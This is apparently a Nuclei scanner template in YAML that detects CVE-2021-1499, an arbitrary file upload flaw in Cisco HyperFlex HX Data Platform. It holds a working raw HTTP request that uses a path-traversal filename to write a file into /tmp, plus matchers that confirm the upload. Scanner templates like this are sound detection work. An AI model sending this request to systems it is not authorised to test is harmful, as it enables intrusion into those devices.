67 lines
2.4 KiB
YAML
67 lines
2.4 KiB
YAML
id: CVE-2021-1499
|
|
|
|
info:
|
|
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
|
|
author: gy741
|
|
severity: medium
|
|
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
|
|
remediation: |
|
|
Apply the necessary security patches or updates provided by Cisco
|
|
reference:
|
|
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
|
|
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
|
|
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-1499
|
|
cwe-id: CWE-306
|
|
epss-score: 0.96621
|
|
epss-percentile: 0.995
|
|
cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cisco
|
|
product: hyperflex_hx_data_platform
|
|
tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /upload HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}
|
|
|
|
-----------------------------253855577425106594691130420583
|
|
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
|
|
Content-Type: application/json
|
|
|
|
MyPasswdNewData->/api/tomcat
|
|
|
|
-----------------------------253855577425106594691130420583--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{"result":'
|
|
- '"filename:'
|
|
- '/tmp/passwd9'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220513f9fb16801bef24219e1e78649fb70c3ee8c6c9fb80c0a31ec882ba456dc560220622e5e9278c04c46474883fad87d09ad394e0518e09a4cea69db604039d10d0c:922c64590222798bb761d5b6d8e72950
|